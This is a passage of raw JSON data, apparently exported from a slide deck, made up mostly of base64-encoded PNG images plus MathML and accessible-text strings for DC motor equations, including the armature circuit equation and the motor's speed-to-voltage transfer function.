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\&quot;,\&quot;slideId\&quot;:282,\&quot;accessibleText\&quot;:\&quot;L s I open parentheses s close parentheses space plus space R I open parentheses s close parentheses space equals space V open parentheses s close parentheses space minus space K omega open parentheses s close parentheses\&quot;,\&quot;imageHeight\&quot;:9.240790655884995},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;G&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;mi&gt;V&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mfrac&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mrow&gt;&lt;mfenced&gt;&lt;mrow&gt;&lt;mi&gt;J&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mfenced&gt;&lt;mrow&gt;&lt;mi&gt;L&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;R&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;iVBORw0KGgoAAAANSUhEUgAABfsAAADFCAYAAADjVSg5AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAABGJhU0UAAABvHSnuVwAAP15JREFUeNrt3Q+EFtv/wPGPtZJrRZJ1JZFkJYkkSRJJsrIiWVlfWZIrSSJJklySJEkkSZIlWUkSV5Ikl2sl13UtV5IkkayVlbi/+dxnnl+zs3POef7MnzMz7xfH17e7z8w5Z+ac5zlnznyOCAAA6ZsXpGU1Lv9qbgEAAAAAAAAAQJltCdJkkCZqWv5DQfo3SFeD1MftAAAAAAAAAAAok/lBuiKNie7pIA3WtB76g/R7WA9vg7SJWwMAANTQ3vD3UJppynK+kZTOAQAAAAC1tiZIf4UDpE9B2ljz+tAHH+NhfXwP0hFuEQAAUDMbgnQ3SL8F6at0NwE/E6QnQbphOd/mID0M0pcOz/F3kMa4bAAAAADqbFgaK/l1kPQxSANUyf+7GhlA3g5SL1UCAABqSheHXJf2JuAfBWlbkHraPJeGUjwQ+Y1qSxp6cjOXBwAAAEDdnYkMlHSin41p57oUqaMnQhx/AABQb+ektYn+kRTOdd9y/G9BOsblAAAAAIDGa9TR+KnrqBKj6Cq2l0FaSJUAAICaWiPuif40JuH195ZpZf9kmA8AAAAAqL2xyGBJY9Jvp0qcHkXq7IU04voDAADUzUpxx85Pg2lV/x3hTUsAAAAA+M/N2IDpMFXSEh1UTkbq7QFVAgAAamhI7JP9afy2PJ9wXN0keJTqBwAAAICGs7FB0xhV0pZVQZqJ1N8FqgQAANTMRbFP9i/p8vhJewLoggv2lgIAAACA0L7YoOldkBZQLW07FqvHYaoEAADUyGsxT/T/2eWxbwhhewAAAADASlekf40NnHZQLR17FanHz0FaSpUAAIAa+Fnsq/ovdXhc3Yz3NyFsDwAAAABYzZO5K7DGqZaubInV5zOqBAAA1MCo2Cf7d3ZwTF2U8o/M3eR3FdUNAAAAALOdiQ2evgdpJdXSteexej1IlQAAgIq7J+aJ/m9B6m3zeCNBmhbC9gAAAACA04A0JvfZlDd9g7F61XA+i6gWAABQUT0yd2I+mh63cSydzL8phO0BAAAAgJY9TBiIbaRaUvMhVrcXqRIAAFBRW8QewudYi8dZF6RJIWwPAAAAALRsY8IgbJJqSdVFmRsiaRnVAgAAKuhXsU/2r27hGCdk7lunGrbnJ6oXAAAAAMyeJAzCfqVaUrUtoY6vUC0AAKCC/hDzRP9Hx2eXBumZELYHAAAAANq22jAQ20LVpEpj136TuZvT9VM1AACgQhaLfVX/Lctn9wbpixC2BwAAAEAB1gbpYDho0Zj376Wx+eqUNDZlbdXN8DOfgvQmSA/CYx7IYXBzJWEQppPQPSW+Lpr3YWlsMPw2SDNhmd5J4/XvnYbyafzYPzLM16OEuj5FMwIAABWyV+yT/XsTPrMgSLcT/lb/jbA9AAAAADKzPEjnpDFxHF91pAOSX6Qx0bykjWNuDD9zRBoT1J9jx34tjYn/tOmE95eEgdXTEl8ffcjyxjHI/De8fufDv98S1u/XsP6zctaQDwAAgKoYc/wGWxT7+03SWJwRD9uzn6oEAAAAkJUVCYMX3TTsWpDWpHyuXmlsShYfHE1Iupu67jIMwq6V9BodTyjL83AQ2VzJrw9rjgbpg6Hs5zPM35DhnNtoXgAAoCK+iHmifyLyd/rbLGkhBGF7AAAAAGSmNxyIxOOtv85hIDIqyZuaDaR0/BuGgdhwCa/TcEI5fg+vX5LF4X9v5dXytKww1Pd1mhkAAKiA9WJf1f9r+HcrJXkTX/1tStgeAAAAAJnQydnXCQOR8SDNyykPSRPSk0Gan8KxTavby7bSvE8a+x3Ey+HaN6E/4XM7MsynrmD7npDPTzQ1AABQAafFPtmvvzF1Mct07N9176phqg8AAABAVrbK3Nj5mu7mnI9fDIOls10ed7llILawZNfqsKEc8zr4bNZlf2vI6zqaHAAAKLnnlt+XuuDhgeG/XaHqAAAAAGRlp8wN26PppZjDwpjoRr0jQTooncXb32EYFOmKqG7eLthrGYiVzUNDWVrRKz9Wl83kkFfTIPcIzQ4AAJRYnyS/wdhK0s+tpAoBAAAApE1X9CdN9OtmY0vbPNZo7Fj6inK78fb7LAOjbuLLXzYc83MJr9mUdL6yXzU3Xp7IIa+3DXm9S9MDAAAltlfsE/ovHP/9EVUIAAAAIE26osg0cXywzWONSjqbsfZaBkU3uyjruOGYL0t43UyryAZb/PxI+PdjOeT1miGvb2l+AACgxG6IfTJfF8386fibQaoRAAAAQBp+CtLfhoHHH20ea5Ukvx3Q6aol04DoeRfl/cdwzAclvHbThrLcaPHza8O/v5BDXg9brmcvzRAAAJTUB8tvnMnwb7aIfbJf/66HqgQAAADQrauWgcemNo/1RNJ9Rdl0rC9dlHdGqhNO5pGhLPrAZUkLn++R7sMitWrEcj030AwBAEAJrRH7JH50A95xx98epzoBAAAAdGOTZcDxrM1jbXAMYDpZOW86VqcbytpCA90p4fU7JN2HOuqTfFbW2+LZ7qIpAgCAEjrq+P07FPnb5WJ+A7a5x9UiqhQAAABAp15bBhxb2jzWTcdg51abx7NNzH/rsLx9KebPBwuC9FXSezMjS0OWfA7TFAEAQAk9cfxejS+o+NXxe/k6VQoAAACgE8OWgcbfbR5LBzIzjsHLoTaP2W851tcOy7zKcswbJb2O58Qe/7XPk3zusuRzP80RAACUjP7+/W75ffMk4TP6u+y94zfzGqoWAAAAQLteWQYZR9s81g7HoEXT1hSP+a7DMm+T6q2kWhikT9J9OJ+s7bTk8QTNEQAAlMyQdBaDf7/jcy+oWgAAAADt2GwZYOgKpf42j+d6JVlX/fe0eUxbjPfxDstdxcl+NeKo/2Me5NE22X+FJgkAAErmmuP31zrLZyccnyXEIQAAAICW2eLrP+3geOOOAcv9Do55xnK88x2We634vwK+U/cd12BbwfmzTfZfokkCAICS+cfy2+aj47PrHb/b3gZpPlUMAAAAwEVX2E9bBhe/dHDML44By0gHx7xnOd5gh2VfINXaoDdqUTgwtA06+wvM36Alb6M0SwAAUCIrHb99W/ldecdxjNNUMwAAAACX7Y6BxUCbx+txHE830+1kZdI7w/G+SWNDtE70WvI5VoFrq6vEbBslPygwb7a4tvtolgAAoEQOOX7/7m3hGEscv9tmwr8BAAAAAKOTlkHFpw6Ot8Ax2OkkHvsiy/Hudll+06DqXk0Gn7sKytceS56GaJYAAKBEXOETF7V4nNOO44xR1QAAAABsxiTdifSNYt/sd0UHx7RNDO/osvyvDMd9WKFr/NxSf68LytM+8Xc/AQAAgFbpm6LfLL9rJto4lr79agvDqGkzVQ4AAADA5HfLYOJ4B8fbZjne9Q7zeMNwvMkUyn8vw2P7QkMxfRe/Jtf3W/LTR7MEAAAlsUPsk/O/tnm8YcfxXlHlAAAAAExsm/N2Ek5lwHAsPc/PHebxveGYh1Io/xlLfqvksuU63yggPxfFvKcDAABAWVwU++T81g6O+cJxzINUOwAAAIAktteO13dwPFPM/uMd5m+T4XhvpLEZcLdsG8X2eHrNTgVptM3PLBXz6v4i3mK4ZcjLU5okAAAokb8svyW/dvh7cq3YJ/s/hr+5AQAAAGAW20BifgfH60k4zl/S+cT5VUPehlMqv21D4ZWeXrMp6Ww/hXviz2r6cUNeLtEkAQBASSxx/JYe7+LY1x3HPk/1AwAAAIizrezvxGKZu4J8Q4fH0tjtXxPy9TzlOnhtKP+gh9er+TDlfQefNW10/K2AckwY8rKbJgkAAEpiVLILt6O/qacsx9bf2yu5BAAAAACi3kq6k/0nJb2J5JMJeZoJ0qqU6+CCofy/eHi9VkTyt6TNz/YbyjlVQDlmDINWNucFAABlcU/sk/3Lujz+ccfxH3EJAAAAALQ6SGnXwiB9lrmT85LSsTQdzaAOTPsC3PLweg1Kd6vFksr5OOcyLDbk4xnNEQAAlIS+bTlt+R39TwrnmCf2hTm+vokKAAAAoCCHJb2Y/Umbrn6XzuL1X0s41oMM6yFpIDXh4fUake42s026zmdzLsOglOdNCgAAgCRbxT4Jfzul8xx1nKebvbEAAAAAVMzPMjfGfjNta+M4I5ZByLo285Q0GfxKsg3xclaSH1T0ena94iGHBtr4rGlF/UDOZThpqOvFNEcAAFASl8Q+CX8kpfMscpxH0ykuBwAAAICmm4aBw7EWP68rm6Ib/d4J0pPI/z/TRl5WB+lLLB9vpBFvPktLJfmhh2+vRo9J5287JG3Qe7+AMjxIyMc9miEAACgJDa/zSewT8MdTPN+041waNnMNlwUAAACA0tX9SfHxX7fw2R1B+hr5zG/SWA2/IfJvH4O0oIVjrQ7/NpqHP8P85eFuQh1c8uxaPU7I474WP/si9jl9qLI85/zra+bfEsqwkWYIAABKwrWqX9PvKZ1rRQvn0vS+gN91AAAAADy1U9qLo64T+r/K3I1eo3H+o28M6GpuWzzR/TJ31dIjaWzUm5d1CeV/69l1mkrIo06e73Z87kTC53YUkP/tCfl4QfMDAAAlsFaSF4eYki6C2SydxdTXtwf+J41J/FbPp78TTwdpJZcKAAAAwC5Jfk1Y49k3V9drOJ1DQfon9jcXEo6nMfZfyuwVTtsiA55lQToojTcIosfSPBwuqA4eib+rzntkdoz7aZkdekhD8gyGg8PmIHFH+O/xgWBR4YmuJ9TvZpoeAADw1JYgjYs7lI4rzI4ubtBwjLb9oHRxhi6Q+SjmPbXamfjX37XXuIQAAABAfenrv4/bGEg8F/tkuE7432zxWLpC/YrkF7YnyZqEfF336Npofp7Jjzce9AGArpZ/2GId62B1WUH5n5cwUH5IkwMAAB4ble4m3eNpnuVcv6V8ruakPwAAAICa09eUzwfpaThI0BVJGptfXyXWCeNT0oix3yp9nfhsOIhpHk/TO2m8Dq0r/Bd6UvZrMvchRL8H+doZXgPTZP16aTyYeBepX43L/yi8XkW/0n1Y5q5yI7YsAAAAAAAAACATi4L0SWZPTF+kWrqiq9jexer0GNUCAAAAAAAAAMjSHpm7up9V6J07HavPp1QJAAAAAACAn3TV5rIal381twBQOXeE+PJp0IckM5F61E3n+qkWAAAAAAAA/2wJ0mSQJmpa/kPSmMC6Ko3NSAFUQ1/Yt0Un/Ieplra9lNlx+jdRJQAAAAAAoIzWSGNySDdN1E0tX0tjw0Sd8PgWpq/hv/0ZpPtBuhWkI9LYjLGVyWP9m4fh8fM0P0hXpDGBMx2kwZpeY12h+ntYD2+FiSygSnRT28/yY7Ja++plVEvLzsnshyV7qRIAAAAAAFAWGs5GYz2PBWlKZk9ydJr0IYBOqg9JY+PIpqVBOhikN+Hf3cqxnPoQ46/wvLqR5caaX3d98DEe1sd3aTysAVANW6XxYLbZJ0+EbR528X0PDlIlAAAAAACgDAaCdFkaq/STJux1okhX7WvIF12xvzBIPZHP68SRrggfkcaDAtNxbCmvFZP6psK0/Ii9PMDl/39XI9fjdpB6qRKgEoZi/e1dqsRqs8yO03+IKgEAAAAAAL5bIY1JXdME/N/SWM3Y7ipQfUPglyC9l9Yn+3/OobxnZPYmi2xMO9elSB09EeL4A1WxS2ZPYF+kShLpm1/N0Ef6phP7HAAAAAAAAK/p5P1ZmR3aIZo+SGOVfrd+kka8f9dE/985lPlG5Hwaomgdt4FR9Jrp5pQLqRKgEjSkTzSG/1mqZJa10ngQ/G9YT9uoEgAAAAAA4DNdtaiT66aJdw3vkPbk7gGxT/Zfz7jMY5Fz6UrN7dwGTo8idfZCiPENVIVu2jsZad9nqJL/6N4tzQchuqfLCqoEAAAAAAD4TOPi2+LpH8vw3Mcs592d4Xlvxs51mNugJRq+Jzoh+IAqASpjgcx+CHq95vUxGPlu1Lrg4SYAAAAAAPDaSbGvrt+dQx4eGs6dVZiYs7HzjHEbtGWVzI7xfYEqASpF49E3V7Pfr2kd7Jcf+7js4ZYAAAAAAAC+uyz2if59OeVjiczdJ+B1RufaFzvPO2msZkV74m9ksFklUC2LpLGnyWhNy785SHfCegAAAAAAAPCarsa2TfSfyjk/V2Pnv5LBOXRFejxc0Q5uhY69itSjrgJeSpUAAAAAAAAAQH6Oin2i/2EBedoQy8NQysefJ423BaLnGOdW6MqWWH0+o0oAAAAAAAAAIB+64aBtol/jExcVtuBjmIfv0tgINk1nYuXUc6zkduja81i9HqRKAAAAAAAAACBbK4L0RYrfkNfkbpiHP1I+7oA0JvfZlDd98YdHGs6HGNcAAAAAAAAAkJGeIE2If+F7os6G+biQ8nEfJpR1I7dEaj7E6vYiVQIAAAAAAAAA2dANd20T/d+ksfK/SPvCvAymeMyNCWWd5HZI1UWZGyJpGdUCAAAAAAAAAOlaHqQZsU/2+7Aau18aYYR6Uzzmk4Sy/sotkaptCXV8hWoBAAAAAAAAgHTdF/eq/v4Klnu1obxbuCVS1RPeQ3W4pwAAAAAAAACgEBvEPtGv6VJFy35Fkh9s9JS4TJr3YWlsMPxWGm9saJneBelOkHYayndM0t/4OOpRQl2fovkBAAAAAAAAQDoei3uyf3kFy60T3l8Syvq0xGXSvQzetHA9deL/fPj3+hbDgSB9lcYDgqycNeQDAAAAAAAAANClAXFPDD+uaNl3Gcp7raTlOZ5QludB2iQ/VvLrQ5ujQfpgKPv5DPM3ZDjnNpohAAAAAAAAAHRHw/O4Jvv3VLTsNwzlHS5hWYYTyvG7mDcyXhz+9/hn9maYxxWG+r5OMwQAAAAAAACAzulq709in+iflnLHr7cxrW4v20rzPsN1HHR8rj/hczsyvt++J+TzE00RAAAAAAAAADqnk8GuVf13Klr25ZYyLyxZWQ4byjGvg89mXfa3hryuq0F729ZCe/M1DdFdAqAfBAAAAADAX9dbGNzurWjZ9xrK+72EZXloKEsrNMzPdPj3Mznk9YEhr0dq0N6Y5AJQd/SDAAAAAABk5G0Lg9uFFS37ZUN5P5ewLFPS+cp+NRb+/UQOeb1tyOvdGrQ3JrkA1B39IAAAAAAAGehvYWD7usLlHzeU+WUJy/LdUJbBFj8/Ev79WA55vWbI69satDkmuQDUHf0gAAAAAAAZGGphYHuzwuX/x1DmByUsy7ShLDda/Pza8O8v5JDXw5b7rbfibY5JLgB1Rz8IAAAAAEAGTrYwsN2f0bk1vMxMBqkdM1KdcDKPDGX5FqQlLXy+R/Lbn2HEcr9toFmiA/+SSKTMEui/SCQSiUQikUgkEolUgrH4rRYOvCOjwW1POLE8Ko2wLjrBPtVBwZ8H6WqQ/hekPW2cv9dyzDslnCw4JN2/ndEn+ays32vJ6y7mfcBkGYnEZD/9F4lEIpFIJBKJRCKRGIu350ELB+7LccA7T8zx3OPpaZBWdHGuPsuxb5VwsmBBkL5ayrTJo7zawkcNM+8DJstIJCb76b9IJBKJRCKRSCQSicRYvD0vHQf9XtDA96MjX6/CBwPdWGU5/g0pp3OWMk3m/ODGZpfkHzYKTJaRSCQm++m/SCQSiUQikUgkEolU2bH4J8dBvxQ08H3iyFcaq9RtGwReL+mEwULHNb3pST53WvJ4gnkfMFlGIjHZT/9FIpFIJBKJRCKRSCTG4ulO9r8paOBri93/OqVzVHGyX404rukxzyf7rzDvAwAAAAAAAADteSf2ieHHBeRpniNPZ1M6z1rxfwV8p+476nBbwfmzTfZfolkCAAAAAAAAQHseiX1S+GEBedrpyNPWlM6zQKq1QW/UoiC9tZRP90ToLzB/g5a8jdIsAQAAAAAAAKA9Y2KfWJ8oIE9nLfn5FqSelM7TaznPWAWu7fogzVjK+KDAvA1Z8rWPZgkAAAAAAAAA7bFNrGv6XECefrfk51HK5zJNht+ryPU95Li+uwrK1x5LnoZolgAAAAAAAADQHtsKa03fc87PAkd+jqd8vlfiT/iirDyX7Dc7btc+8Xc/AQAAAAAAAAAonT5pTOjbJtiX5ZifvY68bEz5fPcM55ms0DUecFzjIibX91vy01fxNrfNcY/7nHjrAgD9IAAAAAAAHnvmGNjuzjEvtj0EvmZwvjOGc01X7BpfttTrjQLyczHHa+wbJrkA1B39IAAAAAAAGTniGNjmORk8ZclHFnH0bWGMejy9XqeCNNrmZ5aKeXV/EW8x3DLk5WkN2huTXADqjn4QAAAAAICMLA7SN8vA9kNO+djkGGAfyuCctj0CVnp6vfSByN0OPmcKWVTEavpxQ14u1aC9MckFoO7oBwEAAAAAyNA1x+B2MIc8nHHkYXVG531dYJnb1RPm7X0Hn91jKOe3AsoxIcWHjCoKk1wA6o5+EAAAAACADOkqdtsmri9zyMMflvN/yvC8Fwzn/MXD67Qikr8lbX6231DOqQLKM